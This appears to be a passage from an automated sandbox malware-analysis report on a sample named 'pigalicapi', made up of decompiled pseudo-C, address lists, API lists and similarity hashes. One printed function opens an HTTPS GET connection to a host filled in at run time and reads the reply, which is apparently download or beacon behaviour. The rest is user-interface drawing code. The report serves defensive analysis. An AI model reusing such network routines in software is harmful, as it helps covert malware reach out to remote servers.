                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_v8 = _v300;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								InternetCloseHandle(_v20);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v12);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x04002909
                                                                                                                                                                                                                                                                                          0x04002914
                                                                                                                                                                                                                                                                                          0x04002936
                                                                                                                                                                                                                                                                                          0x04002942
                                                                                                                                                                                                                                                                                          0x04002949
                                                                                                                                                                                                                                                                                          0x04002972
                                                                                                                                                                                                                                                                                          0x04002979
                                                                                                                                                                                                                                                                                          0x040029a3
                                                                                                                                                                                                                                                                                          0x040029aa
                                                                                                                                                                                                                                                                                          0x040029c0
                                                                                                                                                                                                                                                                                          0x040029c9
                                                                                                                                                                                                                                                                                          0x040029d0
                                                                                                                                                                                                                                                                                          0x040029e8
                                                                                                                                                                                                                                                                                          0x040029f9
                                                                                                                                                                                                                                                                                          0x04002a0e
                                                                                                                                                                                                                                                                                          0x04002a33
                                                                                                                                                                                                                                                                                          0x04002ab5
                                                                                                                                                                                                                                                                                          0x04002a35
                                                                                                                                                                                                                                                                                          0x04002a35
                                                                                                                                                                                                                                                                                          0x04002a3f
                                                                                                                                                                                                                                                                                          0x04002a4a
                                                                                                                                                                                                                                                                                          0x04002a73
                                                                                                                                                                                                                                                                                          0x04002a80
                                                                                                                                                                                                                                                                                          0x04002a90
                                                                                                                                                                                                                                                                                          0x04002a9f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002a82
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002a80
                                                                                                                                                                                                                                                                                          0x04002aaa
                                                                                                                                                                                                                                                                                          0x04002aaa
                                                                                                                                                                                                                                                                                          0x04002acb
                                                                                                                                                                                                                                                                                          0x04002acb
                                                                                                                                                                                                                                                                                          0x04002ad5
                                                                                                                                                                                                                                                                                          0x04002ad5
                                                                                                                                                                                                                                                                                          0x04002adf
                                                                                                                                                                                                                                                                                          0x04002adf
                                                                                                                                                                                                                                                                                          0x04002949
                                                                                                                                                                                                                                                                                          0x04002aeb

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(0400C398,00000001,00000000,00000000,00000000), ref: 0400293C
                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,00000000,000001BB,0400C3D2,0400C3D1,00000003,00000000,00000000), ref: 0400296C
                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,GET,0400C3D8,1.1,00000000,00000000,80800000,00000000), ref: 0400299D
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 040029C0
                                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 040029E8
                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002A0E
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0400C3EC,00000000,00000000), ref: 04002A1C
                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,0400C3EC,00000000), ref: 04002A2B
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 04002A73
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04002AAF
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002ACB
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002AD5
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002ADF
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                                                          • String ID: 1.1$GET$https://%s
                                                                                                                                                                                                                                                                                          • API String ID: 2082764430-1670984264
                                                                                                                                                                                                                                                                                          • Opcode ID: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                                          • Instruction ID: 6d54c3b05ff69590bd14da6a4fff8ed2da31e3bdf774b399ca20979b5291bdcc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02510C71944218AFEB24CF94DC89BEEB7B4EB49700F108598F605B62C0C7B8AE94CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E0080F090(void* __ebx, intOrPtr* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v211;
                                                                                                                                                                                                                                                                                          				char _v212;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v216;
                                                                                                                                                                                                                                                                                          				void* _v220;
                                                                                                                                                                                                                                                                                          				void* _v224;
                                                                                                                                                                                                                                                                                          				CHAR* _v228;
                                                                                                                                                                                                                                                                                          				CHAR* _v232;
                                                                                                                                                                                                                                                                                          				CHAR* _v236;
                                                                                                                                                                                                                                                                                          				CHAR* _v240;
                                                                                                                                                                                                                                                                                          				CHAR* _v244;
                                                                                                                                                                                                                                                                                          				CHAR* _v248;
                                                                                                                                                                                                                                                                                          				CHAR* _v252;
                                                                                                                                                                                                                                                                                          				void* _v256;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                                                                                                          				intOrPtr _t60;
                                                                                                                                                                                                                                                                                          				signed char _t65;
                                                                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t121;
                                                                                                                                                                                                                                                                                          				RECT* _t122;
                                                                                                                                                                                                                                                                                          				signed int _t125;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t106 = __edx;
                                                                                                                                                                                                                                                                                          				_t89 = __ebx;
                                                                                                                                                                                                                                                                                          				_t58 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t58 ^ _t125;
                                                                                                                                                                                                                                                                                          				_t123 = __edx;
                                                                                                                                                                                                                                                                                          				_t60 =  *((intOrPtr*)(__edx + 0xc));
                                                                                                                                                                                                                                                                                          				_v216 = __ecx;
                                                                                                                                                                                                                                                                                          				if(_t60 != 1) {
                                                                                                                                                                                                                                                                                          					if(_t60 != 0x10001) {
                                                                                                                                                                                                                                                                                          						L17:
                                                                                                                                                                                                                                                                                          						return E008159E6(0, _t89, _v8 ^ _t125, _t106, 0, _t123);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(( *(__ebx + 0x85) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          							if(( *(__ebx + 0x84) & 0x00000080) == 0) {
                                                                                                                                                                                                                                                                                          								 *(_t123 + 0x3c) = GetSysColor(0x11);
                                                                                                                                                                                                                                                                                          								 *_v216 = 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t65 =  *(__edx + 0x28);
                                                                                                                                                                                                                                                                                          							if((_t65 & 0 | (_t65 & 0x00000004) == 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                                                                          								 *(_t123 + 0x3c) = GetSysColor(0x11);
                                                                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if((_t65 & 0x00000041) == 0) {
                                                                                                                                                                                                                                                                                          									if(( *(__ebx + 0x84) & 0x00000080) == 0) {
                                                                                                                                                                                                                                                                                          										goto L8;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t122 = __edx + 0x14;
                                                                                                                                                                                                                                                                                          									FillRect( *(_t123 + 0x10), _t122, GetSysColorBrush(0x1d));
                                                                                                                                                                                                                                                                                          									FrameRect( *(_t123 + 0x10), _t122, GetSysColorBrush(0xd));
                                                                                                                                                                                                                                                                                          									asm("sbb edx, edx");
                                                                                                                                                                                                                                                                                          									 *(_t123 + 0x3c) = GetSysColor(( ~( *(__ebx + 0x84) & 0x80) & 0xfffffffd) + 0x11);
                                                                                                                                                                                                                                                                                          									L9:
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t121 =  *(_t123 + 0x10);
                                                                                                                                                                                                                                                                                          							SetTextColor(_t121,  *(_t123 + 0x3c));
                                                                                                                                                                                                                                                                                          							SetBkMode(_t121,  *(_t123 + 0x64));
                                                                                                                                                                                                                                                                                          							_t70 = SendMessageA( *(_t89 + 4), 0x31, 0, 0);
                                                                                                                                                                                                                                                                                          							_v224 = _t70;
                                                                                                                                                                                                                                                                                          							_v220 = 0;
                                                                                                                                                                                                                                                                                          							if(_t70 != 0) {
                                                                                                                                                                                                                                                                                          								_v220 = SelectObject(_t121, _t70);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v212 = 0;
                                                                                                                                                                                                                                                                                          							E00816820( &_v211, 0, 0xc7);
                                                                                                                                                                                                                                                                                          							_v252 = 0;
                                                                                                                                                                                                                                                                                          							_v232 = 0;
                                                                                                                                                                                                                                                                                          							_v228 = 0;
                                                                                                                                                                                                                                                                                          							_v248 = 0;
                                                                                                                                                                                                                                                                                          							_v244 = 0;
                                                                                                                                                                                                                                                                                          							_v240 = 0;
                                                                                                                                                                                                                                                                                          							_v236 = 0;
                                                                                                                                                                                                                                                                                          							_v232 =  &_v212;
                                                                                                                                                                                                                                                                                          							_v256 = 0x20;
                                                                                                                                                                                                                                                                                          							_v252 = 2;
                                                                                                                                                                                                                                                                                          							_v228 = 0xc8;
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t89 + 4), 0x441,  *(_t123 + 0x24),  &_v256);
                                                                                                                                                                                                                                                                                          							_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                                                          							DrawTextA(_t121,  &_v212, 0xffffffff, _t123 + 0x14,  !(( *(_t89 + 0x85) & 0x000000ff) << 0x12) & 0x00100000 | 0x00000025);
                                                                                                                                                                                                                                                                                          							if(_v224 != 0) {
                                                                                                                                                                                                                                                                                          								SelectObject(_t121, _v220);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							 *_v216 = 1;
                                                                                                                                                                                                                                                                                          							return E008159E6(4, _t89, _v8 ^ _t125, _v216, _t121, _t124);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *__ecx = 1;
                                                                                                                                                                                                                                                                                          					return E008159E6(0x20, __ebx, _v8 ^ _t125, __edx, 0, __edx);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}


























                                                                                                                                                                                                                                                                                          0x0080f090
                                                                                                                                                                                                                                                                                          0x0080f090
                                                                                                                                                                                                                                                                                          0x0080f099
                                                                                                                                                                                                                                                                                          0x0080f0a0
                                                                                                                                                                                                                                                                                          0x0080f0a4
                                                                                                                                                                                                                                                                                          0x0080f0a6
                                                                                                                                                                                                                                                                                          0x0080f0ac
                                                                                                                                                                                                                                                                                          0x0080f0b5
                                                                                                                                                                                                                                                                                          0x0080f0d5
                                                                                                                                                                                                                                                                                          0x0080f2b0
                                                                                                                                                                                                                                                                                          0x0080f2c1
                                                                                                                                                                                                                                                                                          0x0080f0db
                                                                                                                                                                                                                                                                                          0x0080f0e2
                                                                                                                                                                                                                                                                                          0x0080f297
                                                                                                                                                                                                                                                                                          0x0080f2a1
                                                                                                                                                                                                                                                                                          0x0080f2aa
                                                                                                                                                                                                                                                                                          0x0080f2aa
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080f0e8
                                                                                                                                                                                                                                                                                          0x0080f0e8
                                                                                                                                                                                                                                                                                          0x0080f0f8
                                                                                                                                                                                                                                                                                          0x0080f14b
                                                                                                                                                                                                                                                                                          0x0080f153
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080f0fa
                                                                                                                                                                                                                                                                                          0x0080f0fc
                                                                                                                                                                                                                                                                                          0x0080f149
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080f0fe
                                                                                                                                                                                                                                                                                          0x0080f100
                                                                                                                                                                                                                                                                                          0x0080f10f
                                                                                                                                                                                                                                                                                          0x0080f123
                                                                                                                                                                                                                                                                                          0x0080f137
                                                                                                                                                                                                                                                                                          0x0080f153
                                                                                                                                                                                                                                                                                          0x0080f14d
                                                                                                                                                                                                                                                                                          0x0080f153
                                                                                                                                                                                                                                                                                          0x0080f0fc
                                                                                                                                                                                                                                                                                          0x0080f159
                                                                                                                                                                                                                                                                                          0x0080f15e
                                                                                                                                                                                                                                                                                          0x0080f169
                                                                                                                                                                                                                                                                                          0x0080f179
                                                                                                                                                                                                                                                                                          0x0080f17f
                                                                                                                                                                                                                                                                                          0x0080f185
                                                                                                                                                                                                                                                                                          0x0080f191
                                                                                                                                                                                                                                                                                          0x0080f19b
                                                                                                                                                                                                                                                                                          0x0080f19b
                                                                                                                                                                                                                                                                                          0x0080f1af
                                                                                                                                                                                                                                                                                          0x0080f1b6
                                                                                                                                                                                                                                                                                          0x0080f1c0
                                                                                                                                                                                                                                                                                          0x0080f1c6
                                                                                                                                                                                                                                                                                          0x0080f1cc
                                                                                                                                                                                                                                                                                          0x0080f1d9
                                                                                                                                                                                                                                                                                          0x0080f1df
                                                                                                                                                                                                                                                                                          0x0080f1e5
                                                                                                                                                                                                                                                                                          0x0080f1eb
                                                                                                                                                                                                                                                                                          0x0080f1fb
                                                                                                                                                                                                                                                                                          0x0080f20a
                                                                                                                                                                                                                                                                                          0x0080f214
                                                                                                                                                                                                                                                                                          0x0080f21e
                                                                                                                                                                                                                                                                                          0x0080f228
                                                                                                                                                                                                                                                                                          0x0080f244
                                                                                                                                                                                                                                                                                          0x0080f252
                                                                                                                                                                                                                                                                                          0x0080f25f
                                                                                                                                                                                                                                                                                          0x0080f269
                                                                                                                                                                                                                                                                                          0x0080f269
                                                                                                                                                                                                                                                                                          0x0080f27a
                                                                                                                                                                                                                                                                                          0x0080f28f
                                                                                                                                                                                                                                                                                          0x0080f28f
                                                                                                                                                                                                                                                                                          0x0080f0e2
                                                                                                                                                                                                                                                                                          0x0080f0b7
                                                                                                                                                                                                                                                                                          0x0080f0ba
                                                                                                                                                                                                                                                                                          0x0080f0cf
                                                                                                                                                                                                                                                                                          0x0080f0cf

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Color$BrushMessageRectSend$FillFrameModeObjectSelectText_memset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3018652888-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: b033c4492c18b1f73497139a68de2a4e1d00d227573a45e7ed5edd2f2e2de88a
                                                                                                                                                                                                                                                                                          • Instruction ID: 18072f8d2fcf838b3135be2bae3bb21c3263c098ff4149ef17b1941979be57a7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b033c4492c18b1f73497139a68de2a4e1d00d227573a45e7ed5edd2f2e2de88a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F751A271500219DFDB70CF68DD49BAABBF8FB88710F0081AAEA49E6681D7745985CF60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                          			E00810AF0(void* __ecx, void* __esi, int _a4, int _a8, long _a12) {
                                                                                                                                                                                                                                                                                          				signed char _v0;
                                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v32;
                                                                                                                                                                                                                                                                                          				long _v36;
                                                                                                                                                                                                                                                                                          				long _v40;
                                                                                                                                                                                                                                                                                          				struct tagPOINT _v48;
                                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                                          				long _v64;
                                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                                          				int _v76;
                                                                                                                                                                                                                                                                                          				int _v80;
                                                                                                                                                                                                                                                                                          				int _v84;
                                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                                          				int _v92;
                                                                                                                                                                                                                                                                                          				struct tagMSG _v116;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				long _t113;
                                                                                                                                                                                                                                                                                          				signed int _t114;
                                                                                                                                                                                                                                                                                          				int _t129;
                                                                                                                                                                                                                                                                                          				signed int _t133;
                                                                                                                                                                                                                                                                                          				long _t144;
                                                                                                                                                                                                                                                                                          				signed char _t146;
                                                                                                                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                                                                                                                          				int _t152;
                                                                                                                                                                                                                                                                                          				intOrPtr _t168;
                                                                                                                                                                                                                                                                                          				int _t173;
                                                                                                                                                                                                                                                                                          				void* _t182;
                                                                                                                                                                                                                                                                                          				void* _t183;
                                                                                                                                                                                                                                                                                          				void* _t185;
                                                                                                                                                                                                                                                                                          				intOrPtr _t186;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t187;
                                                                                                                                                                                                                                                                                          				signed int _t192;
                                                                                                                                                                                                                                                                                          				int _t206;
                                                                                                                                                                                                                                                                                          				struct HHOOK__** _t211;
                                                                                                                                                                                                                                                                                          				intOrPtr _t215;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t233;
                                                                                                                                                                                                                                                                                          				int _t234;
                                                                                                                                                                                                                                                                                          				int _t235;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t236;
                                                                                                                                                                                                                                                                                          				signed int _t237;
                                                                                                                                                                                                                                                                                          				signed int _t238;
                                                                                                                                                                                                                                                                                          				void* _t239;
                                                                                                                                                                                                                                                                                          				void* _t240;
                                                                                                                                                                                                                                                                                          				void* _t241;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t243;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t246;
                                                                                                                                                                                                                                                                                          				struct HWND__** _t248;
                                                                                                                                                                                                                                                                                          				intOrPtr _t249;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t250;
                                                                                                                                                                                                                                                                                          				intOrPtr _t251;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t252;
                                                                                                                                                                                                                                                                                          				signed int _t255;
                                                                                                                                                                                                                                                                                          				signed int _t256;
                                                                                                                                                                                                                                                                                          				void* _t262;
                                                                                                                                                                                                                                                                                          				intOrPtr _t271;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t256 = _t255 & 0xfffffff8;
                                                                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 && _a8 == 1) {
                                                                                                                                                                                                                                                                                          					if( *0x8819a8 == 0) {
                                                                                                                                                                                                                                                                                          						_t251 =  *0x88196c; // 0x8819bc
                                                                                                                                                                                                                                                                                          						_t252 = _t251 + 0x10;
                                                                                                                                                                                                                                                                                          						EnterCriticalSection(_t252);
                                                                                                                                                                                                                                                                                          						if( *0x8819a8 == 0) {
                                                                                                                                                                                                                                                                                          							 *0x8819a8 = RegisterWindowMessageA("WTL_CmdBar_InternalGetBarMsg");
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection(_t252);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t168 =  *((intOrPtr*)(_a12 + 4));
                                                                                                                                                                                                                                                                                          					_t262 = _t168 -  *0x8819a8; // 0x0
                                                                                                                                                                                                                                                                                          					if(_t262 != 0 && _t168 != 0x37f) {
                                                                                                                                                                                                                                                                                          						_t243 =  *_a12;
                                                                                                                                                                                                                                                                                          						_t248 = 0;
                                                                                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                                                                                          						while(_t243 != 0) {
                                                                                                                                                                                                                                                                                          							if( *0x8819a8 == 0) {
                                                                                                                                                                                                                                                                                          								_t249 =  *0x88196c; // 0x8819bc
                                                                                                                                                                                                                                                                                          								_t250 = _t249 + 0x10;
                                                                                                                                                                                                                                                                                          								EnterCriticalSection(_t250);
                                                                                                                                                                                                                                                                                          								if( *0x8819a8 == 0) {
                                                                                                                                                                                                                                                                                          									 *0x8819a8 = RegisterWindowMessageA("WTL_CmdBar_InternalGetBarMsg");
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								LeaveCriticalSection(_t250);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t173 =  *0x8819a8; // 0x0
                                                                                                                                                                                                                                                                                          							_t248 = SendMessageA(_t243, _t173,  &_v8, 0);
                                                                                                                                                                                                                                                                                          							_t243 = GetParent(_t243);
                                                                                                                                                                                                                                                                                          							if(_t248 == 0) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                                                                                                          								if(_v8 == GetCurrentProcessId()) {
                                                                                                                                                                                                                                                                                          									_t248[7] =  *_a12;
                                                                                                                                                                                                                                                                                          									if(IsWindow( *_t248) != 0) {
                                                                                                                                                                                                                                                                                          										SendMessageA( *_t248, 0x37f, 0, _a12);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(_t248 != 0) {
                                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L20:
                                                                                                                                                                                                                                                                                          				_t271 =  *0x881994; // 0x0
                                                                                                                                                                                                                                                                                          				if(_t271 == 0) {
                                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t113 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          					_t233 =  *0x881994; // 0x0
                                                                                                                                                                                                                                                                                          					_t215 =  *((intOrPtr*)(_t233 + 8));
                                                                                                                                                                                                                                                                                          					_t192 = 0;
                                                                                                                                                                                                                                                                                          					if(_t215 <= 0) {
                                                                                                                                                                                                                                                                                          						goto L25;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t246 =  *_t233;
                                                                                                                                                                                                                                                                                          						while( *_t246 != _t113) {
                                                                                                                                                                                                                                                                                          							_t192 = _t192 + 1;
                                                                                                                                                                                                                                                                                          							_t246 = _t246 + 4;
                                                                                                                                                                                                                                                                                          							if(_t192 < _t215) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L25;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L55;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(_t192 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          							goto L25;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							if(_t192 < 0 || _t192 >= _t215) {
                                                                                                                                                                                                                                                                                          								RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								_t254 = _t256;
                                                                                                                                                                                                                                                                                          								_t114 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          								_v32.left = _t114 ^ _t256;
                                                                                                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                                                                                                          								_push(_t233);
                                                                                                                                                                                                                                                                                          								_v48.x = 0;
                                                                                                                                                                                                                                                                                          								_v48.y = 0;
                                                                                                                                                                                                                                                                                          								_v40 = 0;
                                                                                                                                                                                                                                                                                          								_v36 = 0;
                                                                                                                                                                                                                                                                                          								_t234 = _t192;
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t246 + 4), 0x41d, _t234,  &_v48);
                                                                                                                                                                                                                                                                                          								_v116.time.x = _v48.x;
                                                                                                                                                                                                                                                                                          								_v116.pt.x = _v36;
                                                                                                                                                                                                                                                                                          								MapWindowPoints( *(_t246 + 4), 0,  &(_v116.time), 1);
                                                                                                                                                                                                                                                                                          								MapWindowPoints( *(_t246 + 4), 0,  &_v48, 2);
                                                                                                                                                                                                                                                                                          								_v64 = 0;
                                                                                                                                                                                                                                                                                          								_v60 = 0;
                                                                                                                                                                                                                                                                                          								_v56 = 0;
                                                                                                                                                                                                                                                                                          								_v52 = 0;
                                                                                                                                                                                                                                                                                          								_v60 = _v48.y;
                                                                                                                                                                                                                                                                                          								_v64 = _v48.x;
                                                                                                                                                                                                                                                                                          								_v68 = 0x14;
                                                                                                                                                                                                                                                                                          								_v56 = _v40;
                                                                                                                                                                                                                                                                                          								_v52 = _v36;
                                                                                                                                                                                                                                                                                          								_v116.lParam = GetSubMenu( *(_t246 + 0x44), _t234);
                                                                                                                                                                                                                                                                                          								_v88 = 0;
                                                                                                                                                                                                                                                                                          								_v84 = 0;
                                                                                                                                                                                                                                                                                          								_v80 = 0;
                                                                                                                                                                                                                                                                                          								_v76 = 0;
                                                                                                                                                                                                                                                                                          								_v72 = 0;
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t246 + 4), 0x417, _t234,  &_v88);
                                                                                                                                                                                                                                                                                          								_t129 = _v84;
                                                                                                                                                                                                                                                                                          								_v92 = _t129;
                                                                                                                                                                                                                                                                                          								 *(_t246 + 0x88) = _t234;
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t246 + 4), 0x403, _t129, 1);
                                                                                                                                                                                                                                                                                          								_t235 = _v92;
